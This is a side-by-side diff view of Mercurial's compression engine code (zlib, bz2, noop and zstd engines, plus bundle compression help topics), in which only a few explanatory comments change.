3485 pos2 = pos + 2**20
3497 pos2 = pos + 2**20
3486 parts.append(z.compress(data[pos:pos2]))
3498 parts.append(z.compress(data[pos:pos2]))
3487 pos = pos2
3499 pos = pos2
3488 parts.append(z.flush())
3500 parts.append(z.flush())
3489
3501
3490 if sum(map(len, parts)) < insize:
3502 if sum(map(len, parts)) < insize:
3491 return ''.join(parts)
3503 return ''.join(parts)
3492 return None
3504 return None
3493
3505
3494 def decompress(self, data):
3506 def decompress(self, data):
3495 try:
3507 try:
3496 return zlib.decompress(data)
3508 return zlib.decompress(data)
3497 except zlib.error as e:
3509 except zlib.error as e:
3498 raise error.RevlogError(_('revlog decompress error: %s') %
3510 raise error.RevlogError(_('revlog decompress error: %s') %
3499 str(e))
3511 str(e))
3500
3512
3501 def revlogcompressor(self, opts=None):
3513 def revlogcompressor(self, opts=None):
3502 return self.zlibrevlogcompressor()
3514 return self.zlibrevlogcompressor()
3503
3515
3504 compengines.register(_zlibengine())
3516 compengines.register(_zlibengine())
3505
3517
3506 class _bz2engine(compressionengine):
3518 class _bz2engine(compressionengine):
3507 def name(self):
3519 def name(self):
3508 return 'bz2'
3520 return 'bz2'
3509
3521
3510 def bundletype(self):
3522 def bundletype(self):
3511 """An algorithm that produces smaller bundles than ``gzip``.
3523 """An algorithm that produces smaller bundles than ``gzip``.
3512
3524
3513 All Mercurial clients should support this format.
3525 All Mercurial clients should support this format.
3514
3526
3515 This engine will likely produce smaller bundles than ``gzip`` but
3527 This engine will likely produce smaller bundles than ``gzip`` but
3516 will be significantly slower, both during compression and
3528 will be significantly slower, both during compression and
3517 decompression.
3529 decompression.
3518
3530
3519 If available, the ``zstd`` engine can yield similar or better
3531 If available, the ``zstd`` engine can yield similar or better
3520 compression at much higher speeds.
3532 compression at much higher speeds.
3521 """
3533 """
3522 return 'bzip2', 'BZ'
3534 return 'bzip2', 'BZ'
3523
3535
3524 # We declare a protocol name but don't advertise by default because
3536 # We declare a protocol name but don't advertise by default because
3525 # it is slow.
3537 # it is slow.
3526 def wireprotosupport(self):
3538 def wireprotosupport(self):
3527 return compewireprotosupport('bzip2', 0, 0)
3539 return compewireprotosupport('bzip2', 0, 0)
3528
3540
3529 def compressstream(self, it, opts=None):
3541 def compressstream(self, it, opts=None):
3530 opts = opts or {}
3542 opts = opts or {}
3531 z = bz2.BZ2Compressor(opts.get('level', 9))
3543 z = bz2.BZ2Compressor(opts.get('level', 9))
3532 for chunk in it:
3544 for chunk in it:
3533 data = z.compress(chunk)
3545 data = z.compress(chunk)
3534 if data:
3546 if data:
3535 yield data
3547 yield data
3536
3548
3537 yield z.flush()
3549 yield z.flush()
3538
3550
3539 def decompressorreader(self, fh):
3551 def decompressorreader(self, fh):
3540 def gen():
3552 def gen():
3541 d = bz2.BZ2Decompressor()
3553 d = bz2.BZ2Decompressor()
3542 for chunk in filechunkiter(fh):
3554 for chunk in filechunkiter(fh):
3543 yield d.decompress(chunk)
3555 yield d.decompress(chunk)
3544
3556
3545 return chunkbuffer(gen())
3557 return chunkbuffer(gen())
3546
3558
3547 compengines.register(_bz2engine())
3559 compengines.register(_bz2engine())
3548
3560
3549 class _truncatedbz2engine(compressionengine):
3561 class _truncatedbz2engine(compressionengine):
3550 def name(self):
3562 def name(self):
3551 return 'bz2truncated'
3563 return 'bz2truncated'
3552
3564
3553 def bundletype(self):
3565 def bundletype(self):
3554 return None, '_truncatedBZ'
3566 return None, '_truncatedBZ'
3555
3567
3556 # We don't implement compressstream because it is hackily handled elsewhere.
3568 # We don't implement compressstream because it is hackily handled elsewhere.
3557
3569
3558 def decompressorreader(self, fh):
3570 def decompressorreader(self, fh):
3559 def gen():
3571 def gen():
3560 # The input stream doesn't have the 'BZ' header. So add it back.
3572 # The input stream doesn't have the 'BZ' header. So add it back.
3561 d = bz2.BZ2Decompressor()
3573 d = bz2.BZ2Decompressor()
3562 d.decompress('BZ')
3574 d.decompress('BZ')
3563 for chunk in filechunkiter(fh):
3575 for chunk in filechunkiter(fh):
3564 yield d.decompress(chunk)
3576 yield d.decompress(chunk)
3565
3577
3566 return chunkbuffer(gen())
3578 return chunkbuffer(gen())
3567
3579
3568 compengines.register(_truncatedbz2engine())
3580 compengines.register(_truncatedbz2engine())
3569
3581
3570 class _noopengine(compressionengine):
3582 class _noopengine(compressionengine):
3571 def name(self):
3583 def name(self):
3572 return 'none'
3584 return 'none'
3573
3585
3574 def bundletype(self):
3586 def bundletype(self):
3575 """No compression is performed.
3587 """No compression is performed.
3576
3588
3577 Use this compression engine to explicitly disable compression.
3589 Use this compression engine to explicitly disable compression.
3578 """
3590 """
3579 return 'none', 'UN'
3591 return 'none', 'UN'
3580
3592
3581 # Clients always support uncompressed payloads. Servers don't because
3593 # Clients always support uncompressed payloads. Servers don't because
3582 # unless you are on a fast network, uncompressed payloads can easily
3594 # unless you are on a fast network, uncompressed payloads can easily
3583 # saturate your network pipe.
3595 # saturate your network pipe.
3584 def wireprotosupport(self):
3596 def wireprotosupport(self):
3585 return compewireprotosupport('none', 0, 10)
3597 return compewireprotosupport('none', 0, 10)
3586
3598
3587 # We don't implement revlogheader because it is handled specially
3599 # We don't implement revlogheader because it is handled specially
3588 # in the revlog class.
3600 # in the revlog class.
3589
3601
3590 def compressstream(self, it, opts=None):
3602 def compressstream(self, it, opts=None):
3591 return it
3603 return it
3592
3604
3593 def decompressorreader(self, fh):
3605 def decompressorreader(self, fh):
3594 return fh
3606 return fh
3595
3607
3596 class nooprevlogcompressor(object):
3608 class nooprevlogcompressor(object):
3597 def compress(self, data):
3609 def compress(self, data):
3598 return None
3610 return None
3599
3611
3600 def revlogcompressor(self, opts=None):
3612 def revlogcompressor(self, opts=None):
3601 return self.nooprevlogcompressor()
3613 return self.nooprevlogcompressor()
3602
3614
3603 compengines.register(_noopengine())
3615 compengines.register(_noopengine())
3604
3616
3605 class _zstdengine(compressionengine):
3617 class _zstdengine(compressionengine):
3606 def name(self):
3618 def name(self):
3607 return 'zstd'
3619 return 'zstd'
3608
3620
3609 @propertycache
3621 @propertycache
3610 def _module(self):
3622 def _module(self):
3611 # Not all installs have the zstd module available. So defer importing
3623 # Not all installs have the zstd module available. So defer importing
3612 # until first access.
3624 # until first access.
3613 try:
3625 try:
3614 from . import zstd
3626 from . import zstd
3615 # Force delayed import.
3627 # Force delayed import.
3616 zstd.__version__
3628 zstd.__version__
3617 return zstd
3629 return zstd
3618 except ImportError:
3630 except ImportError:
3619 return None
3631 return None
3620
3632
3621 def available(self):
3633 def available(self):
3622 return bool(self._module)
3634 return bool(self._module)
3623
3635
3624 def bundletype(self):
3636 def bundletype(self):
3625 """A modern compression algorithm that is fast and highly flexible.
3637 """A modern compression algorithm that is fast and highly flexible.
3626
3638
3627 Only supported by Mercurial 4.1 and newer clients.
3639 Only supported by Mercurial 4.1 and newer clients.
3628
3640
3629 With the default settings, zstd compression is both faster and yields
3641 With the default settings, zstd compression is both faster and yields
3630 better compression than ``gzip``. It also frequently yields better
3642 better compression than ``gzip``. It also frequently yields better
3631 compression than ``bzip2`` while operating at much higher speeds.
3643 compression than ``bzip2`` while operating at much higher speeds.
3632
3644
3633 If this engine is available and backwards compatibility is not a
3645 If this engine is available and backwards compatibility is not a
3634 concern, it is likely the best available engine.
3646 concern, it is likely the best available engine.
3635 """
3647 """
3636 return 'zstd', 'ZS'
3648 return 'zstd', 'ZS'
3637
3649
3638 def wireprotosupport(self):
3650 def wireprotosupport(self):
3639 return compewireprotosupport('zstd', 50, 50)
3651 return compewireprotosupport('zstd', 50, 50)
3640
3652
3641 def revlogheader(self):
3653 def revlogheader(self):
3642 return '\x28'
3654 return '\x28'
3643
3655
3644 def compressstream(self, it, opts=None):
3656 def compressstream(self, it, opts=None):
3645 opts = opts or {}
3657 opts = opts or {}
3646 # zstd level 3 is almost always significantly faster than zlib
3658 # zstd level 3 is almost always significantly faster than zlib
3647 # while providing no worse compression. It strikes a good balance
3659 # while providing no worse compression. It strikes a good balance
3648 # between speed and compression.
3660 # between speed and compression.
3649 level = opts.get('level', 3)
3661 level = opts.get('level', 3)
3650
3662
3651 zstd = self._module
3663 zstd = self._module
3652 z = zstd.ZstdCompressor(level=level).compressobj()
3664 z = zstd.ZstdCompressor(level=level).compressobj()
3653 for chunk in it:
3665 for chunk in it:
3654 data = z.compress(chunk)
3666 data = z.compress(chunk)
3655 if data:
3667 if data:
3656 yield data
3668 yield data
3657
3669
3658 yield z.flush()
3670 yield z.flush()
3659
3671
3660 def decompressorreader(self, fh):
3672 def decompressorreader(self, fh):
3661 zstd = self._module
3673 zstd = self._module
3662 dctx = zstd.ZstdDecompressor()
3674 dctx = zstd.ZstdDecompressor()
3663 return chunkbuffer(dctx.read_from(fh))
3675 return chunkbuffer(dctx.read_from(fh))
3664
3676
3665 class zstdrevlogcompressor(object):
3677 class zstdrevlogcompressor(object):
3666 def __init__(self, zstd, level=3):
3678 def __init__(self, zstd, level=3):
3667 # Writing the content size adds a few bytes to the output. However,
3679 # Writing the content size adds a few bytes to the output. However,
3668 # it allows decompression to be more optimal since we can
3680 # it allows decompression to be more optimal since we can
3669 # pre-allocate a buffer to hold the result.
3681 # pre-allocate a buffer to hold the result.
3670 self._cctx = zstd.ZstdCompressor(level=level,
3682 self._cctx = zstd.ZstdCompressor(level=level,
3671 write_content_size=True)
3683 write_content_size=True)
3672 self._dctx = zstd.ZstdDecompressor()
3684 self._dctx = zstd.ZstdDecompressor()
3673 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3685 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3674 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3686 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3675
3687
3676 def compress(self, data):
3688 def compress(self, data):
3677 insize = len(data)
3689 insize = len(data)
3678 # Caller handles empty input case.
3690 # Caller handles empty input case.
3679 assert insize > 0
3691 assert insize > 0
3680
3692
3681 if insize < 50:
3693 if insize < 50:
3682 return None
3694 return None
3683
3695
3684 elif insize <= 1000000:
3696 elif insize <= 1000000:
3685 compressed = self._cctx.compress(data)
3697 compressed = self._cctx.compress(data)
3686 if len(compressed) < insize:
3698 if len(compressed) < insize:
3687 return compressed
3699 return compressed
3688 return None
3700 return None
3689 else:
3701 else:
3690 z = self._cctx.compressobj()
3702 z = self._cctx.compressobj()
3691 chunks = []
3703 chunks = []
3692 pos = 0
3704 pos = 0
3693 while pos < insize:
3705 while pos < insize:
3694 pos2 = pos + self._compinsize
3706 pos2 = pos + self._compinsize
3695 chunk = z.compress(data[pos:pos2])
3707 chunk = z.compress(data[pos:pos2])
3696 if chunk:
3708 if chunk:
3697 chunks.append(chunk)
3709 chunks.append(chunk)
3698 pos = pos2
3710 pos = pos2
3699 chunks.append(z.flush())
3711 chunks.append(z.flush())
3700
3712
3701 if sum(map(len, chunks)) < insize:
3713 if sum(map(len, chunks)) < insize:
3702 return ''.join(chunks)
3714 return ''.join(chunks)
3703 return None
3715 return None
3704
3716
3705 def decompress(self, data):
3717 def decompress(self, data):
3706 insize = len(data)
3718 insize = len(data)
3707
3719
3708 try:
3720 try:
3709 # This was measured to be faster than other streaming
3721 # This was measured to be faster than other streaming
3710 # decompressors.
3722 # decompressors.
3711 dobj = self._dctx.decompressobj()
3723 dobj = self._dctx.decompressobj()
3712 chunks = []
3724 chunks = []
3713 pos = 0
3725 pos = 0
3714 while pos < insize:
3726 while pos < insize:
3715 pos2 = pos + self._decompinsize
3727 pos2 = pos + self._decompinsize
3716 chunk = dobj.decompress(data[pos:pos2])
3728 chunk = dobj.decompress(data[pos:pos2])
3717 if chunk:
3729 if chunk:
3718 chunks.append(chunk)
3730 chunks.append(chunk)
3719 pos = pos2
3731 pos = pos2
3720 # Frame should be exhausted, so no finish() API.
3732 # Frame should be exhausted, so no finish() API.
3721
3733
3722 return ''.join(chunks)
3734 return ''.join(chunks)
3723 except Exception as e:
3735 except Exception as e:
3724 raise error.RevlogError(_('revlog decompress error: %s') %
3736 raise error.RevlogError(_('revlog decompress error: %s') %
3725 str(e))
3737 str(e))
3726
3738
3727 def revlogcompressor(self, opts=None):
3739 def revlogcompressor(self, opts=None):
3728 opts = opts or {}
3740 opts = opts or {}
3729 return self.zstdrevlogcompressor(self._module,
3741 return self.zstdrevlogcompressor(self._module,
3730 level=opts.get('level', 3))
3742 level=opts.get('level', 3))
3731
3743
# Register the zstd engine with the global compression engine manager.
compengines.register(_zstdengine())
3733
3745
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.

    # We need to format the docstring. So use a dummy object/type to hold
    # it rather than mutating the original.
    class docobject(object):
        pass

    topics = {}
    for name in compengines:
        engine = compengines[name]

        # Engines whose backing module is missing cannot be offered.
        if not engine.available():
            continue

        bundletype = engine.bundletype()
        if not bundletype or not bundletype[0]:
            continue

        bundlename = bundletype[0]
        holder = docobject()
        holder.__doc__ = pycompat.sysstr('``%s``\n    %s') % (
            bundlename, engine.bundletype.__doc__)
        holder._origdoc = engine.bundletype.__doc__
        holder._origfunc = engine.bundletype
        topics[bundlename] = holder

    return topics
3765
3777
# NOTE(review): presumably exposed so the i18n tooling extracts the
# bundle compression docstrings for translation -- confirm against the
# translation build scripts.
i18nfunctions = bundlecompressiontopics().values()
3767
3779
# convenient shortcut: short alias for debugstacktrace, handy when
# temporarily sprinkling trace calls during debugging
dst = debugstacktrace
General Comments 0
You need to be logged in to leave comments. Login now